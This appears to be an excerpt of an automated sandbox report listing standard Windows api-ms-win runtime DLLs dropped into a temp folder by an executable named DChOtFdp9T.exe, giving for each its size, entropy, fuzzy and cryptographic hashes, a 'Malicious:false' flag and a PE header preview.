                                                                                                                                                                                                                          SHA1:2041EC755EC460FFAAF314A3BFBC4319144592C9
                                                                                                                                                                                                                          SHA-256:611A0E8F979A1E1BE4CEBC384FE390F2BB370C639A36C30E62F9ADBC5E12319F
                                                                                                                                                                                                                          SHA-512:C9B61CF71C091F12B9A7E33E90D47D39565526FEF71180E3025A879AE75220EBE8D0F7FEA7B6D22B1F04C427FCDB41899C2D4716FD33E05632293F4599F922BA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):7.010804148797475
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:cDfIeAWEhW3c6A0GftpBjLeg6RyClurqMu5m7:remii8g4Yru5m7
                                                                                                                                                                                                                          MD5:D4148C6BC8C9881EEDFB64C87375F629
                                                                                                                                                                                                                          SHA1:485D36A00BDEB09DFC3CB87ED239B0F750D68F16
                                                                                                                                                                                                                          SHA-256:6A8AC79A755982C408B86AC6876D0F861C96AD7B3CE203B8951D7D278B113F20
                                                                                                                                                                                                                          SHA-512:67E75D666F9EC431049E01A883A9E96472B5489929D9A81FFF7D1C8518B3980EB9A85C5F510C9DAA2BD38E937CAD307AFBFA11D904B1C554444FD5B174D52A7B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......'.....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18112
                                                                                                                                                                                                                          Entropy (8bit):7.084111141115254
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:s0jFPWEhWEMdqH8z79YOCAs/nGfe4pBjS7JVWYyieHaVWQ4SWZLqnajig64BMu5I:s0hWEhWuc6A0GftpBj8g6ClurqMu5YV
                                                                                                                                                                                                                          MD5:DD988F470CB5FE9370F928548C123F6B
                                                                                                                                                                                                                          SHA1:780C5D6F83EFE5CFA1907D7067CBE555A2021AF1
                                                                                                                                                                                                                          SHA-256:E0F53419E506A1C803AD7B820836313BB6CB84EBC1D79FF237EE52A230CA5E8F
                                                                                                                                                                                                                          SHA-512:19D592786CC54DBA3466F3869AA412378111EC0692F7AB9D051483C942C625CD00708AED93DF89B591A8BB69028DFC3EB3E9CC333B07B421E1E948D68791C70E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):6.97297947908497
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:fGeVdWEhWmc6A0GftpBjcnYkNg6AlurqMu5I:fGeVFNiVkNgGru5I
                                                                                                                                                                                                                          MD5:4A46FDA4D02BCBDC8F65C5D58331E4FF
                                                                                                                                                                                                                          SHA1:F5DCE04D0A1E1940CC8EE82E7337F4C8F3C2295F
                                                                                                                                                                                                                          SHA-256:9431DFA2EDD91E5364B5B03714D12965E206E2DE36D371447FE601D3C7701A77
                                                                                                                                                                                                                          SHA-512:76A7BC63D1C0459CCB75DA6949895802779A78FD42D6F1735E172084C200FA1181B971C8CE158417BD1A51B0B52AF5823C6F3DC106ADE4264252B5B9BC9511C8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......h....`.........................................`................ ...................<..............8............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):7.0239868896825035
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:kyMvfWEhWKzv9A0GftpBj8+g6QEla3OeUdCXTS6P7XP:kyMvPFJiBgZTOMXTt/
                                                                                                                                                                                                                          MD5:8016DA90AB94F09BEE528ED6F8888D48
                                                                                                                                                                                                                          SHA1:F1C0032FDC21A5723211D4BF73919D00A7914060
                                                                                                                                                                                                                          SHA-256:A63DE7EBE8B4715EDADA0E158A9FB4A9D145E38465955CEC271FD35D45DDB085
                                                                                                                                                                                                                          SHA-512:057A867EEFD469267BB746ED88756A9E56B57986F105BC7361C47AD6A4D2620889B4DA53390C81CF554959C38A76BDC42947E73B4C85D14E3FE7CF7CBFC8F475
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......q....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20672
                                                                                                                                                                                                                          Entropy (8bit):6.942105871257977
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:odv3V0dfpkXc0vVaEWEhWdY/zv9A0GftpBj3g6Bgla3OeUdCXTS6P+Xxk:odv3VqpkXc0vVaSIKJixg0/OMXTABk
                                                                                                                                                                                                                          MD5:4AF4A66969482CA9D008E9C873E65C12
                                                                                                                                                                                                                          SHA1:F573F1CC7D91AB531F508E416B299F234669044B
                                                                                                                                                                                                                          SHA-256:1717D6A7996178448D5C5B94D77BCA2C38910F4805208AD125B2626F0159E3EE
                                                                                                                                                                                                                          SHA-512:00DD670B2831BA9DFE57EF727BA0DC103DC915742211A017934E3B37B35816C00EEA583B21D4AA5B32F443AB1B402E5EE7BA7A9E3239524E91FDC8C659F22573
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`...V............ ...................<..............8............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):7.032802115812392
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:9tZ3lWEhWOk9EA0GftpBjddg6xBl5AO9t:v/iZgL4
                                                                                                                                                                                                                          MD5:DD97DF009BAA58CDA29F91C066CEC650
                                                                                                                                                                                                                          SHA1:0E2113E258167AC9373189AA923027ED70D1EA31
                                                                                                                                                                                                                          SHA-256:C5AE7F9D384F80B2F11F267323794D7DF241ABF6572456C8350D95F9325B20D7
                                                                                                                                                                                                                          SHA-512:DB83264BAD01F29ECE873B3926DB204D11421657AA0DC32B91DAA76CF133100639B90ABC67BE7E04CA1CB3539517501995E8C5802CB7FE71DEC27FC58594D9CB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`...v............ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19648
                                                                                                                                                                                                                          Entropy (8bit):6.967691994889848
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:uB2WEhW1zv9A0GftpBjqDg6qhMOlPACNmA:uBsQJi0gBSLomA
                                                                                                                                                                                                                          MD5:1CAB2F6B242DE038F945A64E10A120B3
                                                                                                                                                                                                                          SHA1:5EA81785745E7483449749D4E495918F62300CEB
                                                                                                                                                                                                                          SHA-256:F8A1C96370184068DC7299B92096536F51EB8275BB4840450A90C708E29C0F8B
                                                                                                                                                                                                                          SHA-512:E3A58E2485141B06062FF06BC3FB9195B2020F1DCD512D93515CBD37FB6517FB80ED9EE260AD6888BD3A424DCF0F9F7D541EE4CD0A23C17244EA0E17682B989D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......l.....`.........................................`...E............ ...................<..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):7.07074904254552
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:DPWEhWEjzvXS9YOCAs/nGfe4pBjS7n5WYyieHaVWQ4SW2eqnaj2Zl7F91VpTD+g:LWEhWgzv9A0GftpBjmTg6pelSFjVpn
                                                                                                                                                                                                                          MD5:75AB723020AC262B6B5669B9BE0239C4
                                                                                                                                                                                                                          SHA1:FA6672EB6CA5F2BA3CD1764A98E1C8875D307866
                                                                                                                                                                                                                          SHA-256:AF9BB3FF8B02B16A5AD1897DB329BB934D07DC081984044373F2D1AC03532907
                                                                                                                                                                                                                          SHA-512:83B7CCB5C5F550178E72741FA4CDFEA55B4C55FD0FCA3947618089871872B824CF0E59DA12AB342559E3A34D86D98D855064B651A3168C1CFC583D5D4A47308F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):6.989449771142313
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:ZWEhWf9EA0GftpBjdRg600xlurqMu5OAx7:ZXizRgZPru5Oi
                                                                                                                                                                                                                          MD5:D33BF473059047AAACC520A8DBA40B89
                                                                                                                                                                                                                          SHA1:04587B5C13D0EC68D4F56E7C399BE3FC2C24CB40
                                                                                                                                                                                                                          SHA-256:D9266824E1BA2A0530D7B29D8E85B70177105FDC0358329C9039FFD49A374BDE
                                                                                                                                                                                                                          SHA-512:AF8680B107C46BED1A459030E6F0A609E4AC3DF3BEA179E68BC8394EB7757FD6954C0A8902B7CE19B041BEF038B71890524DBD0D9EACE4D75E4AA260B38A5725
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......Yx....`.........................................`...9............ ...................<..............8............................................................................rdata..L...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19648
                                                                                                                                                                                                                          Entropy (8bit):6.985773954085127
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:4NaPWEhWEcco9h9YOCAs/nGfe4pBjS7p+DZuWYyieHaVWQ4SWUMfqnaj2Zl7F91j:4N+WEhWD9EA0GftpBjoQUg6elSFjV3x
                                                                                                                                                                                                                          MD5:E92CFDB8C9C51A6C71C5C54806523E90
                                                                                                                                                                                                                          SHA1:EBDB0E58D63A1D7BE71FAD242FFB7720AE0E4FD3
                                                                                                                                                                                                                          SHA-256:A808E1F0F9C07ED2F8A79E3FEDF5D38F609F7D0133BF389297792BBDADAB4AD9
                                                                                                                                                                                                                          SHA-512:2F1DFB3F1D7116A1600D646DAEB16CFCC3FB316D7CA1CD2A2F43C9A75778FC794A972B7C7A51CAD7ACE0ED0A4596B0CBC89438F2FD509307703E718AABED4F38
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22720
                                                                                                                                                                                                                          Entropy (8bit):6.832874896217393
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:yDyuWEhWt9EA0GftpBjldW/1/g6BlPACNFN:e1ipW/tg7oFN
                                                                                                                                                                                                                          MD5:ED15EF84534E2FA66367E6C4C9CB7CC9
                                                                                                                                                                                                                          SHA1:AEC86397EEC95EE4E9F79242B4463A24E41D2059
                                                                                                                                                                                                                          SHA-256:A1393AEB73C32CAA5052A76897558B5475C1F396C5476387BA8D7BF3F471BD21
                                                                                                                                                                                                                          SHA-512:E3196E418205EEC8E2B2F735437F92B3E563C753FEDBA99E8944A7E020CCA97ED8DE5226933D367F60BDBAF4A01DBA9D033B92AA1C0A5724EB44DCC76140061D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@............`.........................................`................0...................<..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):6.971155823248431
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:UWEhWT57A0GftpBjh3Xg6YtbTlurqMu5F:CmPirXgZtbqru5F
                                                                                                                                                                                                                          MD5:BBE2AEFB77C6B261BAC6B26E512A6E7D
                                                                                                                                                                                                                          SHA1:18A50FFD595499643D443B983D17F76EF5908D35
                                                                                                                                                                                                                          SHA-256:5EFA4DFBB7DA525EE1DA0F011913B8846CCA53AC7CD23986E5170957E05DC277
                                                                                                                                                                                                                          SHA-512:2FA82403DF54E4088C89F3B5DF90D91DAB968616A7C75F99D4B63D708659999651FF66CA8A4DEC6452A0126830C6AC90666E93ACDA7062E6643510AAB65801BD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`..."............ ...................<..............8............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20672
                                                                                                                                                                                                                          Entropy (8bit):6.985664809494595
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:J81nWm5CcWEhWg57A0GftpBjw9xZg6YRlSFjVvA:JOnWm5C6vPiKfZgBeFNA
                                                                                                                                                                                                                          MD5:17A90B88C1B5DE0BA44B545DECB82A6E
                                                                                                                                                                                                                          SHA1:1977FFC8229B6595A3FAD639B4F51700E462DA65
                                                                                                                                                                                                                          SHA-256:9E997705299430DBB57B202D81D5719EF9D5270ADE741F1BBF2E2AD40AEA087C
                                                                                                                                                                                                                          SHA-512:0E40BE7A8EF7F9FD80EE3C9803BEC5AB4180BB8A7D752943963888D5A4554C5689AF5CEFEB329D67B0912587F98F5D3761DD73C71BABFB2DCFC4B57494A35846
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......X....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19648
                                                                                                                                                                                                                          Entropy (8bit):6.9579400590056455
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:5uZQWEhWK57A0GftpBjDwDq5ug6IZlurqMu5Y:EWtPiJaGugwru5Y
                                                                                                                                                                                                                          MD5:04936CBA5F2D9BA40C3E266824C231E5
                                                                                                                                                                                                                          SHA1:76FFD8C1E2DDFA165E653B86ABA7737E0C57E8A8
                                                                                                                                                                                                                          SHA-256:3F93421FC454937C6F35F48818D72B8E39DBA5D0FBC532DC83DCA55F3D203977
                                                                                                                                                                                                                          SHA-512:9F6A69A90A6A4D572F43500F1942B49432F4F9544AFC1A2FA998F8C0A714BEC87D87C6FA69A5D21385E8E06C3541ADA3B79F0B8B1806035B5E1338F9ED40238D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................<..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):7.0280835382513
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:L9DWEhW7wIp68A0GftpBj1exag6e2lPACNQexS:dUiLjgLoJS
                                                                                                                                                                                                                          MD5:35E02A5275ED2F085378CB8176084B2B
                                                                                                                                                                                                                          SHA1:585C458870B919D700675E215005154852465CA0
                                                                                                                                                                                                                          SHA-256:EC9C2A143354DE7813CEC1E28DC3D8E2CA2BE86731DC8585FA8F8AFDC2BC888E
                                                                                                                                                                                                                          SHA-512:7D297BA6E3C73FCAD574F154B90E2F408C55E8B216E193736753EF681BAF2CB807F0BC61419E1D78B44332071CC06FA1D4CBF2B41DC94BA2F199B4FCADC27DF4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...e............ ...................<..............8............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):27840
                                                                                                                                                                                                                          Entropy (8bit):6.624400777562419
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:LZVacWM4Oe59Ckb1hgmLiWEhWM9EA0GftpBjPGg63XlPACNN:LZVJWMq59Bb1jQIixGg1oN
                                                                                                                                                                                                                          MD5:CB35F30DD6A029B01062BA83519669B7
                                                                                                                                                                                                                          SHA1:C48A8690DCA1FA879FF755D462B0932877D81269
                                                                                                                                                                                                                          SHA-256:EF00BCE29046E7A8FC02C457EB7F3F3D6A5A8B8FCE82458D9880F0306B573EBF
                                                                                                                                                                                                                          SHA-512:98735C93298953D6A9E00F7401A59C05982431F425DDEB0EDB830E98B81FAFBA80FB6978CAFCF1C134AA3B9F018BC7EB04B3F67D83EE298CC8BFDF5A7A1ECEAF
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........,...............................................P............`.........................................`....%...........@...............0...<..............8............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19648
                                                                                                                                                                                                                          Entropy (8bit):6.966906976001115
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:hitIlWEhWT9EA0GftpBj+wg6Gl5AOdMV7S:Y6zi9gWFV7S
                                                                                                                                                                                                                          MD5:E6994EE954AD1F87AC692276D5D88B49
                                                                                                                                                                                                                          SHA1:7D7F71CE40B8D9A2DA42FBB541118EB7DF42744D
                                                                                                                                                                                                                          SHA-256:A8A5B4A98C97C86B03D450FCA7425DA03E60E6A07FBC1FF95F8E49C74DE69B13
                                                                                                                                                                                                                          SHA-512:51ED50386A6A1938A37784ACA93EB7DD63E7CB664EE48C8E1B6FE006003C3962FADB7D7E7073D23315025D25FAD704F8D17BA5C65228474B5E4068E89EE0AD5E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......u$....`.........................................`...x............ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):23232
                                                                                                                                                                                                                          Entropy (8bit):6.840091955457169
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:u42r77WEhWQ9EA0GftpBjM4g6nlHYAg22C6:u42r7DgiXgwYAgs6
                                                                                                                                                                                                                          MD5:A195EC3EC8A4B1338533D1F492F83BA8
                                                                                                                                                                                                                          SHA1:D0C50CE07AAD05131A660E2656FB081705EC1EB6
                                                                                                                                                                                                                          SHA-256:C2F1173A9F345EDB990B99D59AF4DB54C66AB3769215C2AD7C1B51CB26586C0F
                                                                                                                                                                                                                          SHA-512:1D222FE1B30821C6D0DA1BB4A2999B1C7517BEC5C8A9EB1DCA0C9DB73E3E42F9E60F630B9EA47E13249C35A8EF2DEB6143BB5B1F90BA015D05B67C2DD8387780
                                                                                                                                                                                                                          Malicious:false
